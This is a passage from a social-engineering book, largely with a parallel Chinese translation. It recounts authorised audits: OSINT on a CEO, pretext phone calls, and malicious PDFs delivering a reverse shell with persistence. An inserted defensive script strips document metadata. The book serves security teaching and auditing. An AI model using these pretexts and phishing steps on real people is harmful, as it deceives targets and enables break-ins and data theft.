"Not next week," she told him, because she was going to Kentucky for her sister's wedding. Any other time, she would do whatever she could.

At this point it seemed like game over. Keith had all the information he had set out to obtain, and now it was just a matter of calling the banks and offshore accounts, a task that, with the information he now held, had become much easier.

A well-executed and truly awe-inspiring attack.

Applying the SE Framework to the SSA Hack

The SSA attack just described leaves your mouth ajar and eyes wide. You can learn much from this particular attack, which used the social engineering framework.

Keith started the attack with information gathering. You are probably really tired of hearing me say this over and over again, but having information is truly the crux of every good social engineering attack—the more you have, the better.

Keith first found a truly amazing piece of intel on the Web, which, dumbfoundingly enough, is still online at https://secure.ssa.gov/apps10/poms.nsf/.

This link directs you to an online manual for Program Operations of the Social Security Administration. It contains abbreviations, lingo, and instructions, as well as what SSA employees are allowed to tell law enforcement. Armed with this information, Keith knew what to ask, how to ask it, and how to sound like he belonged, as well as what information would raise red flags.

Although the link provided a wealth of information, he decided to take his information gathering a step further, using the pretext of an Inspector General Office employee and calling his local SSA office. He really thought outside the box by using his local office to obtain the internal numbers needed to complete his pretext as an internal employee.

Keith switched pretexts a couple of times and did so masterfully. He was able to obtain much of the information he needed by using the online SSA manual to develop the right questions. This manual proved to be an elicitation developer’s dream. Armed with the right words and language, he sounded like he fit right in. He built rapport and a frame that fed the pretexts perfectly. Building rapport is not an easy task, but Keith did it well and in a way that indicated he was well practiced in this technique. He used many influence tactics to make sure the target felt comfortable and at ease. For example, he mixed obligation and reciprocation artfully. When he got May Linn on his side by describing the lack of good tools and the lack of support from his management, she felt obligated to help him out.

He also used keywords and phrases that commanded empathy and yet showed his authority, such as “my boss is not happy with me,” which gives an indication that he is in trouble and that the SSA employee, May Linn, can save him. People have a moral obligation to save those in need. Not many can walk away when someone is asking for help, and May Linn couldn’t either. She felt compelled not only to help, but even to tell Keith about her personal schedule.

In the end, Keith used a number of important skills in the framework that do not involve onsite, in-person action.

The fact that governmental systems are run by people makes them fallible to the hacking methods used in this story. This is not an argument for the invention of robotic or computerized systems to do these jobs; it merely points to the fact that many of these systems rely so much on overworked, underpaid, overstressed people that manipulating them is not a very hard job.

To be honest, improving upon this particular attack is difficult, because it is not one I would ever perform myself, and Keith did a superb job of applying the principles of the framework.

So many people are used to being mistreated, abused, and yelled at that a little bit of kindness can make them go to extraordinary heights to help out. This particular attack, as relayed in Mitnick’s The Art of Deception, shows how vulnerable systems that rely on people truly are.

Hadnagy Case Study 1: The Overconfident CEO

My experience with an overconfident CEO is interesting because the CEO thought he would be impervious to any social engineering attempt for two reasons: first, he did not use technology much in his personal life, and second, he felt that he was too smart and protected to fall for what he called “silly games.”

With that said to his internal security team, they decided to ask me to focus on him as the goal of the audit. They knew that if he did fail the audit it would be easier to get approval to implement many of the fixes that would help their security.

The Target

The target was a decent-sized printing company in the U.S. that had some proprietary processes and vendors that some of its competitors were after. The IT and security teams realized the company had some weaknesses and convinced the CEO an audit was needed. In a phone meeting with my partner, the CEO arrogantly said that he knew that “hacking him would be next to impossible because he guarded these secrets with his life.” Not even some of his core staff knew all the details.

My job as the SE auditor was to infiltrate the company, obtain access to one of the company’s servers where this proprietary information was held, and retrieve it. The difficulty, as the CEO had mentioned on the phone, was that the passwords for the servers were stored on his computer, and no one had access to it, not even the security staff, without his permission.

The Story

Apparently, the way in would have to involve the CEO, which presented a challenge because he was ready and waiting for an infiltration attempt. I started off as I did with any gig—by information gathering. I researched the company using online resources and other tools such as Maltego. I was able to harvest information such as locations of servers, IP addresses, e-mail addresses, phone numbers, physical addresses, mail servers, employee names and titles, and much more.

Of course, I documented all this information in a fashion that made it easy to use later on. The structure of the e-mail addresses was important, because as I searched the website I saw that it was firstname.lastname@company.com. I could not locate the CEO’s e-mail address, but many articles on their site listed his name (let’s call him Charles Jones) and title. This would be information a standard, non-informed attacker would be able to obtain.

Using the firstname.lastname@company.com format, I tried to send an e-mail to him. It didn’t work. I was actually disappointed at this moment, because I was sure that the e-mail method would yield a lot of juicy details.

I decided to try a nickname for Charles, so I tried chuck.jones@company.com. Sweet success! I had a verified e-mail address. Now I just had to verify it was the CEO’s and not some other guy with the same name.

I spent some more time on Google and Maltego to harvest as much information as I could. Maltego has a great transform that allows me to search a domain for any files that would be visible to a normal search engine.

I ran the transform against the company’s domain and was greeted with an amazing number of files for my browsing. Maltego doesn’t stop with just providing filenames with this transform. Many files contain metadata, which is the information about the dates, creators, and other little juicy tidbits about the file. Running Maltego’s metadata transform showed me that the majority of these files were created by a “Chuck Jones.” Much of the content in the files talked about him as the CEO.
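For a defender, the lesson in that metadata transform is an audit step: before a document goes onto a public site, check what its embedded properties say about who wrote it and when. What follows is an added example, not code from the book and not Maltego’s transform: it reads the docProps/core.xml part that .docx/.xlsx/.pptx packages carry, lists the fields that name a person or a timeline, and strips them. The package it inspects is constructed in memory (the creator name copies the story’s pseudonym; the dates are invented), so it runs offline. The InvoiceApril.xls from the story is in the older binary format and would need a different parser; the check below covers the modern zip-based formats.

```python
"""Audit and scrub the author/timeline metadata in an OOXML document.

Added example (not from the book or from Maltego). The package is constructed
in memory: the creator name mirrors the story's pseudonym, the dates are invented.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml in an OOXML package.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
XSI = "http://www.w3.org/2001/XMLSchema-instance"

# Core-property fields we report, and the subset that exposes a person or a timeline.
FIELDS = {
    "title": "dc:title",
    "creator": "dc:creator",
    "last_modified_by": "cp:lastModifiedBy",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
}
SENSITIVE = ("creator", "last_modified_by", "created", "modified")

# Constructed sample core.xml: "Chuck Jones" is the story's pseudonym, the dates are made up.
SAMPLE_CORE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties
    xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:dcterms="http://purl.org/dc/terms/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>InvoiceApril</dc:title>
  <dc:creator>Chuck Jones</dc:creator>
  <cp:lastModifiedBy>Chuck Jones</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-04-02T14:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-04-03T09:30:00Z</dcterms:modified>
</cp:coreProperties>"""


def build_sample(core_xml: bytes = SAMPLE_CORE) -> bytes:
    """Constructed package: just enough of an OOXML zip to carry a core.xml part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core_xml)
    return buf.getvalue()


def read_core_properties(data: bytes) -> dict:
    """Return the core properties of a package as {short_name: text}.

    A non-zip input or a package without docProps/core.xml yields {} rather than
    raising, so the function can be mapped over every file on a web root.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if "docProps/core.xml" not in zf.namelist():
                return {}
            root = ET.fromstring(zf.read("docProps/core.xml"))
    except zipfile.BadZipFile:
        return {}
    props = {}
    for name, path in FIELDS.items():
        node = root.find(path, NS)
        if node is not None and node.text:
            props[name] = node.text.strip()
    return props


def leaks(data: bytes) -> list:
    """Short names of the fields that would expose a person or a timeline if published."""
    props = read_core_properties(data)
    return [name for name in SENSITIVE if name in props]


def scrub(data: bytes) -> bytes:
    """Return a copy of the package with the sensitive core properties removed.

    This is the pre-publication step; every other part of the zip is copied unchanged.
    """
    for prefix, uri in NS.items():
        ET.register_namespace(prefix, uri)
    ET.register_namespace("xsi", XSI)
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for item in src.infolist():
            payload = src.read(item.filename)
            if item.filename == "docProps/core.xml":
                root = ET.fromstring(payload)
                for name in SENSITIVE:
                    for node in root.findall(FIELDS[name], NS):
                        root.remove(node)
                payload = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
            dst.writestr(item, payload)
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    print("published file exposes:", read_core_properties(sample))
    print("sensitive fields:", leaks(sample))
    print("after scrub:", read_core_properties(scrub(sample)))
```

Running read_core_properties over every document a search engine can reach on your own domain reproduces what the transform showed the auditor, and scrub is the fix to apply before the next upload. The application-level part (docProps/app.xml, which can carry a company name) is handled the same way and is omitted here for brevity.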
This was the confirmation I needed, but during my browsing one file had caught my eye—InvoiceApril.xls. Upon reading that file I discovered it was an invoice from a local bank for a marketing venture Chuck was involved in. I had the bank name, the date, and the amount, but I didn’t have the event the company was a part of.

I did a quick search of the bank website, but because the event was six months earlier it was not listed on the site. What could I do?

I decided to place a call to the marketing person from the bank:

“Hi, this is Tom from [CompanyName]. I am trying to organize our books and I see an invoice here from April for $3,500 as a sponsorship package. I don’t see the event name—can you please tell me what that invoice was for?”

“Sure, Tom,” she said, and I heard some clicking noise in the background. “I see that was the bank’s annual Children’s Cancer Fund Drive and you were part of the Silver Package.”

“Thanks a lot; I am new here and I appreciate your help. Talk with you later.”

I was beginning to see a picture of a possible attack vector that I could use, but I needed some more research, and I needed to make a very carefully planned phone call.

I found a few articles on the Web about this fundraiser and how many companies came from all over the community to support it with money for cancer treatment research. In addition, the more digging I did into the CEO, the more I found out about him. I had his parents’ names, his sisters’ names, pictures of his kids that he has on Facebook, the church he went to when he lived near his parents, a review he wrote of his favorite restaurant, his favorite sporting team, his oldest son’s favorite sporting team and where he attended college, where his kids go to school, and the list goes on and on.

I wanted to find out why the company donates to the Children’s Cancer Fund. Although many malicious social engineers exploit others’ emotions, and I realized I might have to go down that path as well, I wanted to know whether the fund was something he was involved in because one of his sons has cancer. I placed a call to the marketing director of the company:

“Hello, this is Tom from XYZ. I was hired by First National Bank in town to call those who took part in the April Children’s Cancer Fund, and I was wondering whether I could take a few minutes of your time to get some feedback?”

“Sure,” Sue, the marketing director, said.

“Sue, I see that you were part of our Silver Package in April. Did you feel the marketing you received was worth the price you paid?”

“Well, this is something we do every year and it does get us a lot of press time in the local area. I guess I wouldn’t mind seeing a little more on the website for the Silver Package.”

“Excellent; I will note that. Every year—yes, I can see you do this every year. I am wondering personally, with so many fundraisers out there, why did you choose this one?”

“I know Chuck has always been particular to this one. He is our CEO and I think someone in his family battled cancer.”

“Oh my; I am sorry to hear that. It isn’t his own children, is it?”

“No, I think a nephew or cousin. We didn’t really talk about it.”

“Well, we certainly appreciate your donations and support.”

I finished up with a few more questions and then left it at that, thanking her for her time, and we parted ways.

I got the information I needed—it wasn’t one of his kids who had cancer. Again, I knew this wouldn’t stop a malicious social engineer, but I was very curious. Armed with this information I was ready to plan my attack vector.

I knew the CEO was originally from New York and his favorite restaurant was a place called Domingoes. He would bring his kids in often for a Mets game, and then they would go eat at Domingoes.

He wrote some ratings on the place and talked about his top three favorite dishes. From some other things he wrote on Facebook, I knew his parents still lived close by and he visited often.

I planned my attack vector to be a fundraiser for cancer research. It was for the tri-state area, and for a small donation one’s name would be entered into a raffle. The raffle prize would be two tickets to a Mets game and a choice of three restaurant coupons, one of which was Domingoes.

I would pretend to be from New York myself, but relatively new, in case he threw things at me I didn’t know.

My end goal would be for him to accept a PDF from me that would be maliciously encoded to give me a reverse shell and allow me access to his computer. If he did not use a version of Adobe that would allow me access, then I would try to convince him to download a zip file and execute an enclosed EXE that would have the malicious file embedded.

I practiced the phone conversation I would use for my pretext, I tested my PDF and EXE files, and I had Google Maps open to the location of Domingoes so I could talk about that area openly. After I had my computer ready and waiting to receive the reverse shell from the victim’s machine, I was ready to place the call.

I placed the phone call around 4:00 p.m., because I found out through the company website that the office closes at 4:30 on Fridays. Because I wasn’t on the initial phone call to set up this audit (my partner was), the CEO would not recognize my voice.

“您好,查尔斯·琼斯先生有空吗?”

“Hello, is Mr. Charles Jones available?”

 

“当然,等一下。”电话那头的声音听起来有些疲惫,准备转接我。

“Sure one second.” The voice on the other end sounded tired and was ready to transfer me.

 

“你好,我是查克。”

“Hello, Chuck speaking.”

 

“您好,琼斯先生,我叫托尼,来自美国癌症研究所。我们正在开展年度募捐活动,以支持对困扰男性、女性和儿童的癌症的研究。”

“Hello, Mr. Jones, my name is Tony from the Cancer Research Institute of America. We are running an annual fund drive to support our research into cancers that plague men, women, and children.”

 

“请叫我查克,”他打断道。

“Please, call me Chuck,” he interrupted.

 

这是个好兆头,因为他没有给我任何借口,也没有试图以忙为由结束通话;他主动将谈话变得个性化。我继续说:“查克,谢谢你。我们正在为以前支持过癌症基金的公司开展募捐活动,要求捐款 50 至 150 美元。最棒的是,每个帮助我们的人都有机会参加抽奖,赢取两个大奖。如果你赢了,你将获得两张纽约大都会队比赛的门票,然后在三家很棒的餐厅之一享用双人免费晚餐。我们将提供五份这样的套餐。”

This was a good sign because he didn’t give me any excuses or try to end the phone call saying he was busy; he took it upon himself to personalize the conversation. I continued, “Chuck, thank you. We are running a fund drive for companies who supported cancer funds before and are asking for small donations of $50–$150 dollars. The great part is that everyone who helps us out is being entered into a drawing for two great prizes. If you win you get two tickets to a Mets game in NYC and then a free dinner for two at one of three great restaurants. We are giving out five of those packages.”

 

“大都会队比赛,真的吗?”

“Mets game, really?”

 

“我知道,如果你不喜欢大都会队,这个奖品可能对你没有吸引力,但这里的餐馆很不错。”

“I know, if you don’t like the Mets the prize might not appeal to you, but the restaurants are good.”

 

“不,不,我爱大都会队,所以我这么说。我很高兴。”

“No, no, I love the Mets, that’s why I said that. I was happy.”

 

“好吧,想想看——你不仅帮助了一个伟大的研究基金,而且你还可以参加一场精彩的比赛,还可以去 Morton's、Basil's 或 Domingoes 吃饭。”

“Well think about this—not only are you helping out a great research fund but you get a good game in and you get to eat at Morton’s, Basil’s, or Domingoes.”

 

“Domingoes!真的!我很喜欢那个地方。”

“Domingoes! Really! I love that place.”

 

“哈,太棒了。你知道我前几天晚上第一次去那里,吃了他们的鸡肉波特贝拉。太棒了。”这是他第三喜欢的菜。

“Ha, that is great. You know I just went there the other night for the first time and had their Chicken Portabella. It was awesome.” This was his third-favorite dish.

 

“哦,如果你觉得那个不错,那就算了,你需要尝尝 Fra Diablo。它确实是那里最好的菜。我一直都吃它。”

“Oh, if you think that is good, forget it, you need to try the Fra Diablo. It is really the best dish in there. I eat it all the time.”

 

“我周末会再去那里,我一定会去试试。谢谢你的提示。听着,我知道已经很晚了。现在我甚至不想收钱,我不通过电话收钱。我能做的就是把 PDF 发给你;你可以看看,如果你有兴趣,你可以把支票和表格一起寄给你。”

“I am going there again over the weekend, I will definitely try it out. Thanks for the tip. Look, I know it is getting late. Right now I am not even looking for money, I don’t take money over the phone. What I can do is send you the PDF; you can look at it and if you are interested you can just mail the check in with the form.”

 

“好啊,发过来吧。”

“Heck yeah, send it over.”

 

“好的,我只想问几个问题。你的电子邮箱是?”

“Okay just a couple questions. What is your e-mail?”

 

地址: “ chuck.jones@company.com ”。

chuck.jones@company.com.”

 

“如果可以,请打开您的 PDF 阅读器,单击“帮助”菜单和“关于”,然后告诉我版本号。”

“If you can, open your PDF reader, click the Help menu and About, and tell me the version number please.”

 

“等一下,现在是8点04分。”

“One minute; it is 8.04.”

 

“太好了,我不想给你发一个你用不了的版本。我们通话时,请稍等片刻,我会把这个发给你——好的,已经发了。”

“Excellent; I don’t want to send you a version that you can’t use. Just one second while we are on the phone I am going to send this to you—okay, it’s sent.”

 

“太好了,谢谢。我希望我能赢;我真的很喜欢那个地方。”

“Great, thanks. I hope I win; I really love that place.”

 

“我知道,食物很好吃。在我让你走之前,你能不能先检查一下你是否收到了电子邮件,然后告诉我它是否正常工作?”

“I know; the food is good. Before I let you go, could you just check to see whether you got the e-mail and let me know if it is working?”

 

“当然,我大约五分钟后就会退出,但我可以检查一下。是的,它在这里。”当我听到双击的声音时,我看向 BackTrack 电脑,看到我的恶意有效载荷收集器 Meterpreter(参见第 7 章)正在做出反应。我屏住呼吸(因为这部分永远不会无聊),砰,shell 出现了。我的 Meterpreter 脚本将所有权更改为类似Explorer.exe 的东西。

“Sure, I am logging out in about five minutes, but I can check. Yep, it is here.” When I heard the sound of double-clicking, I looked over on my BackTrack computer saw my malicious payload collector, Meterpreter (see Chapter 7), reacting. I was holding my breath (because this part never gets boring) and bam, the shell appeared. My Meterpreter scripts changed the ownership to something like Explorer.exe.

 

查克接着说:“嗯,我看到的只是一个空白屏幕。它什么也没做。”

Chuck then said, “Hmm, all I got is a blank screen. It’s not doing anything.”

 

“真的吗?这很奇怪。让我检查一下。”我真正想检查的是,我是否可以访问他的驱动器,以及是否可以上传一个在关机时在重启时运行的反向 shell。我说:“对不起,我不知道发生了什么。你能给我一分钟吗,还是你需要走了?”

“Really? That’s odd. Let me check here.” What I was really checking was that I had access to his drive and the ability to upload a reverse shell that would run on reboot in case he shut down. I said, “I am sorry, I don’t know what happened. Can you give me a minute or do you need to go?”

 

“好吧,我得去喝完这个咖啡杯了,所以我会放下电话,马上回来。”

“Well I need to go empty this coffee mug, so I will put the phone down and be back in a minute.”

 

“太好了,谢谢。”这一分钟足以让我确定自己可以不受限制地再次访问他的电脑。他回来了。

“Excellent, thanks.” That minute was all I needed to make sure I had unlimited and returning access to his computer. He came back.

 

“后退。”

“Back.”

 

“好吧,查克,我真的很尴尬,但我不知道发生了什么。我不想耽误你,所以你为什么不去呢?我会在给你制作另一个 PDF 时通过电子邮件将此发送给你。我们可以周一再联系。”

“Well, Chuck, I’m really embarrassed but I don’t know what happened. I don’t want to hold you up, so why don’t you go and I will e-mail this to you when I make you another PDF. We can touch base Monday.”

 

“好的,没问题。祝你周末愉快。”

“Okay, no problem. Have a great weekend.”

 

“你也是,查克。”

“You, too, Chuck.”

 

我们分手了,令我惊讶和欣喜的是,他的电脑仍然开着,并且处于活动状态。是的,他把所有东西都保存在一个只有他才能访问的安全驱动器中,但都是 Word 文档。我立即下载了这些 Word 文档,几个小时内,我就可以访问服务器并打印出他想要保护的所有内部流程。

We parted ways and to my surprise and extreme joy his computer remained on and active. Yes, he kept everything in a secure drive that only he had access to, but in Word documents. I promptly downloaded those Word documents and within a few hours I had access to the servers and printed out all the internal processes he wanted to protect.

 

我们确实在周一早上进行了联系,不是以筹款人托尼的身份,而是以他的安全顾问的身份,带着他的“秘密”、密码的打印件,以及他和他的员工通话的录音。

We did touch base on Monday morning, not as Tony the fund-raiser, but as his security consultants with printouts of his “secrets,” his passwords, and recordings of the phone calls that were made to him and his staff.

 

成功攻击后的首次会面总是充满着客户的最初震惊,并声称我们使用了不公平的策略和个人弱点来获取访问权限。当我们解释说坏人会使用完全相同的策略时,愤怒的表情变成了恐惧,恐惧变成了理解。

This first meeting after a successful attack is always filled with the client’s initial shock and claims that we used unfair tactics and personal weaknesses to gain access. When we explain that the bad guys will use the exact same tactics, the look of anger turns to fear, and that fear turns to understanding.

 

Applying the SE Framework to the Overconfident CEO Hack

As in the previous examples, applying the case to the social engineering framework and seeing what was good and what could have been improved upon can be beneficial.

As always, information gathering is the key to any social engineering effort, and this particular story shows it. Information gathering from many sources—the Web, Maltego, the phone, and more—is what made this attack successful. Insufficient information would have led to a miserable failure.

Proper and plentiful information makes all the difference, even information I never needed, like his church and his parents’ and siblings’ names. These things were useful to have in case I needed them, but what proved to be invaluable was the information found about the e-mail naming convention and the files on the servers using Maltego. This was the pathway to getting my foot in the door of this company.

Keeping the information you find cataloged in BasKet or Dradis, as discussed in Chapter 2, and ready to use is also important; otherwise, you just have a text file with a jumble of information you can’t make use of. Organizing the information is just as important as gathering and using it.

Thinking like a bad guy—that is, looking for ways to exploit the weaknesses and desires of the target—isn’t a great part of the job, but if a professional auditor wants to protect clients, he will show them how vulnerable they are. The more information you gather, the easier finding vulnerabilities becomes. You begin to see pathways that can lead to success.

Developing realistic pretexts and themes that will have the maximum effect also contributes to an attack’s success. One must develop power questions and keywords that will attract the target. By gathering a lot of information I was able to develop good questions and a frame that involved keywords and neurolinguistic programming (NLP) power words, which I then used in influence tactics that I was fairly sure would work.

My pretext had to change often, from calling the company’s vendors to calling internal employees for information. I had to plan out each pretext, get into that character, and successfully follow through. This, of course, took a lot of planning to make sure each pretext sounded right, flowed properly, and made sense.

Practice makes perfect. Before the attack was launched, my partner and I practiced everything. I had to make sure the PDFs worked and that the vector made sense. I also had to have good enough knowledge to be believable to whatever target I was speaking to at the time.

The importance of practicing cannot be overstated. Practice enabled me to figure out what tactics would work and what wouldn’t, as well as ensure that I could stick to the plan and go with the flow, even if that flow was in a direction I wasn’t planning on going.

In hindsight, I discovered a couple of small improvements that would have made this attack more efficient. For one, it is always a risk to rely solely on a malicious PDF; I should have set up a small website that mimicked the real cancer research website and had the PDF on there. Both the website and the PDF could have been malicious. This would have doubled my chances of success and given me a backup in case one avenue failed.

Another large risk I took was that the CEO would leave his computer on when he left the office. If he did not, I would have had to wait till Monday to try to gain access. To keep him at his computer, I should have had a “real PDF” with information in it he could read, which I would send after the malicious PDF succeeded in exploiting his machine. This would have kept him working at his machine long enough to make good use of the exploit.

This audit took about a week’s worth of time to investigate, gather, and organize information, practice, and then launch. One week, and this company’s secrets could have been owned by its competitors or by the highest bidder. Read the story a few times and try to understand the subtle methods used and the way the conversations flowed. Picking up on the voice, tone, and conversation pace is difficult in written form, but try to imagine yourself in this conversation and decide how you would handle it.

Hadnagy 案例研究 2:主题公园丑闻

Hadnagy Case Study 2: The Theme Park Scandal

 

主题公园丑闻案对我来说很有趣,因为它涉及一些现场测试。我使用了本书中提到的许多社会工程学技巧,并在此案中进行了彻底的测试。

The theme park scandal case was interesting to me because it involved some onsite testing. I used many of the social engineering skills mentioned throughout this book and thoroughly tested them during this case.

 

这件事之所以有趣还因为其业务性质以及成功诈骗的可能性。如果成功,社交工程师可能会获得数千张信用卡号码。

It was also interesting because of the nature of the business and the potential for a successful scam. If successful, the social engineer could potentially have access to thousands of credit card numbers.

 

目标

The Target

 

攻击目标是一家主题公园,担心其售票系统之一会受到攻击。在顾客签到的地方,每台计算机都包含指向服务器、客户信息和财务记录的链接。该公园想看看攻击者是否有可能使用恶意方法让员工采取可能导致攻击的行动。

The target was a theme park that was concerned about having one of its ticketing systems compromised. Where patrons checked in, each computer contained a link to the servers, client information, and financial records. The park wanted to see whether the possibility existed for an attacker to use malicious methods to get an employee to take an action that could lead to a compromise.

 

其目的不是让员工陷入麻烦,而是看看员工签到计算机被入侵会造成什么损害。此外,其目的不是通过黑客攻击而是通过纯粹的社会工程手段入侵计算机。

The goal wasn’t to get an employee in trouble, but rather to see what damage would result from an employee check-in computer being compromised. In addition, the goal was not to compromise the computers through hacking but through purely social engineering efforts.

 

如果这种攻击真的发生,后果会怎样?会发现哪些数据,哪些服务器会受到攻击?他们不想深入研究,只是想看看第一阶段,即社会工程攻击是否有效。

If such a compromise could occur, what were the ramifications? What data could be found and what servers could be compromised? They didn’t want to go deep, just really find out whether the first stage, a social engineering compromise, could work.

 

为了弄清楚 SE 攻击是否可能成功,我必须了解主题公园登记顾客的流程和方法,以及员工在终端上会做什么和不会做什么——或者更重要的是,可以做什么和不能做什么。

To figure out whether a successful SE attack was possible, I had to understand the theme park’s processes and methods for checking in customers and what the employees would and wouldn’t do at their terminals—or more importantly, could and couldn’t do.

 

The Story

As mentioned earlier, the goal for this particular job wasn’t really complex; I just had to find out whether the person behind the counter would allow a “customer” to get the employee to do something obviously not allowed. Before I could even think of what that was, I had to understand their business.

I browsed the park’s website and used Maltego and Google to research articles and other information about the organization. I also did some onsite research. I then went to the park and went through the process of buying a ticket at the ticket counter. During this process I started a small conversation with the teller, and spent some time observing the layout, their computer nodes, and other aspects of the “office” area.

This area was where I started to see a clear picture. During the conversation I mentioned I was from a small town with a huge name. When she asked where, and I told her, she issued the normal response:

“Where the heck is that?”

“Do you have Internet access here?”

“Yeah, I do.”

“Oh you’ll love this. Go to maps.google.com and type in the zip code 11111, and put it on satellite view. Look how small that town is.”

“Oh my gosh; that is tiny. I don’t think I’ve ever heard of this place before today.”

In this short amount of time I knew the following:

  • The layout of the space a teller has to work in
  • How employees check in each patron
  • That the computers have full web access

I went back to the park’s website and started browsing with a new enlightenment on their processes. I needed a way into their computer systems. My pretext was a reasonable one—I was a father who was going to take his family to the theme park for the day.

My story was that the family and I hadn’t planned on it, but we came to the hotel and were browsing the web for things to do and saw a great discount for the park. We went down to the lobby and inquired about getting tickets but the price we were given there was substantially more than what we saw on the web.

When we double-checked the price we had found, we discovered it was a web-only price. We paid and then realized the tickets needed to be printed so they could be scanned. I tried to get the hotel to print them but the printer was down. I had already paid and was nervous about losing the tickets so I printed them to a PDF and then e-mailed them to myself. Sounds like a reasonable story, doesn’t it?

One more step was needed before I could launch my evil plot. I had to make a quick phone call:

“Hello, is this XYZ Theme Park main office?”

“Sure is; how can I help you?”

I needed to get to an internal office person to ask my question and make sure I had the right answer. After requesting the purchasing department, I was directed to the right person. I said, “Hi, my name is Paul from SecuriSoft. We are giving away a free trial of new software to read and even print PDFs. I would like to send you the URL for the free download, is that okay?”

“Well, I’m not sure whether we are interested, but you can send me some information.”

“Okay; excellent. Can I ask what version of Adobe you use now?”

“I think we are still on 8.”

“Okay; I will send you out a comparative information packet today.”

Armed with the version information, all I needed to do was create a malicious PDF embedded with a reverse shell (which would give me access to their computer once they opened the PDF), call it Receipt.pdf, and then e-mail it to myself.

The next day I roped my family into a little social engineering action. As they stood off in the distance I approached the woman behind the counter and started a friendly conversation.

“Hi there, how are you…Tina?” I said, reading her name tag.

“Doing okay, what can I help you with?” she said with a friendly customer service smile.

“See, we decided to take a little weekend getaway trip and I am at the Hilton over here with my family,” I said, pointing to my beautiful family a few feet away. “My daughter saw the ad for your theme park and begged us to come. We told her that we would take her. We found a great deal on tickets on the website…”

“Oh, yes, our web-only deal—very popular right now. Can I have your tickets?”

“Yeah, you see, this is where I need your help so I don’t get the ‘Loser Dad of the Year’ award.” My nervous laughter was covered by her smile. I explained, “Tina, I saw that deal and my wife and I said, let’s save the 15% and we bought the tickets at the hotel computer. But after I got done paying, I couldn’t print them because the hotel printer was down. But I was able to save it as a PDF and I e-mailed it to myself.

I know this is an odd request but would you log into my e-mail account and print it out for me?” Now this account was a generic one filled with e-mails titled “Pictures of the kids,” “Dad and Mom’s Anniversary” and things like that.

I could tell she was really struggling with this decision and I was unsure whether the silence would be to my benefit or if I should help her to think it through. I said, “I know it is a weird request, but my little girl is just dying to go and I hate to tell her ‘no.’” I pointed again to my daughter, who was doing a great job at being cute but impatient.

“Okay, how do I do it?”

“Go to gmail.com, log in with Paul1234@gmail.com and a password of B-E-S-M-A-R-T.” (I know, using this password is terrible in a way, but a little last-minute warning never hurt. It went unfollowed.)

Moments later Tina was double-clicking on my PDF and getting a blank screen. “Are you kidding me—did I print it out wrong? Wow, I am definitely getting the Loser Dad award now.”

“You know what, sir? I feel so bad for you, what if you just paid for the adult tickets and I will let your daughter in for free today?”

“Wow, that is so generous of you.” With a smile I forked over the $50 and thanked her for all her help and asked her to log out of my e-mail. We parted ways with me having a happy daughter and the park having been compromised.

Moments later my partner text-messaged me and told me that he was “in” and “gathering” data for the report. After enjoying a few hours of relaxation, we left the park to go back to work to compile the report for the Monday meeting.

Applying the SE Framework to the Theme Park Hack

Information gathering, as shown in this case study, is not always mainly web-based; instead, it can be done in person. The juiciest information in this case was gathered during an in-person visit. Finding out what computer systems were used, feeling out the target to know how he or she would react to certain questions, and knowing how the ticketing system worked were major components of the information gathering stage.

The real takeaway from this particular hack is that a good pretext is more than just a story; it’s more than just some made-up costume and phony accent. A good pretext is something you can easily “live” without too much effort.

In this scenario I was easily able to speak, act, and talk like a father, because I am one. My concern about being a “loser” dad was real, not made up, and it came across as real and was transferred to the target as genuine. This makes everything that is said more believable.

Of course, having a cute child in the distance looking longingly at the ticket lady helped, and so did a believable storyline about a hotel printer not working. Chapter 2 touched on this, but sometimes a social engineer will promote that pretexting or social engineering in general is just basically being a good liar. I do not believe that is the case.

In a professional sense, pretexting involves creating a reality that will manipulate the target’s emotions and actions to take a path you desire him to take. People are not often motivated by a simple lie. A social engineer must “become” the character in the pretext for a gig, which is why using pretexts that are something you can closely follow, live, and act with ease is a good idea.

The pretext of the “free PDF software giveaway” had a lot of room for error. The pretext was solid, but a quick rejection would have meant a couple-day lag in the next attack attempt. It was also a “lucky guess” that the same version of Adobe would be used companywide and that the particular teller I chose had not updated her particular version of Adobe Reader to the newest edition, which would have in essence nullified my exploit attempts.

Banking on inherent human laziness is not a gamble I usually like to take, but in this case it worked out. Sometimes the best bet is to move forward as if what you are asking for is already a done deal. That attitude promotes a feeling of confidence and comes across to the target that what you are saying or doing is legit.

Using words and phrases such as, “I really need your help…” is a powerful tool, as mentioned in Chapter 5. Humans inherently want to help each other, especially when asked.

When asked, complete strangers will go to extraordinary lengths to “help out” even, as in this case, opening an unknown file from someone else’s e-mail account. The plea to help a “poor dad” get his cute daughter into the park led to a compromised system.

Once compromised, the software that stores all the credit card information for each guest was wide open to an attacker. The ability to collect that data with very little effort could have left the park open to massive loss, lawsuits, and embarrassment.

Top-Secret Case Study 1: Mission Not Impossible

Every now and then my colleague and I are either involved in a situation or hear of a story that we would love to see turned into a movie, but for security reasons we are not allowed to write about or even speak of it. For those reasons, I cannot mention who was involved or what was taken in the story that comes to us from a social engineer named “Tim.”

Tim’s goal was to infiltrate a server that housed information that could be devastating if it fell into the wrong hands. The particular high-profile company involved had a lot to protect. When Tim was contracted to get this company’s information he knew he would have to pull out all the stops; this job would test the very limits of his social engineering skills.

The Target

The target was a high-profile organization with certain corporate secrets that should never be revealed to its competitors. These secrets had to be guarded on servers that did not have outside access and were only routable from the internal network.

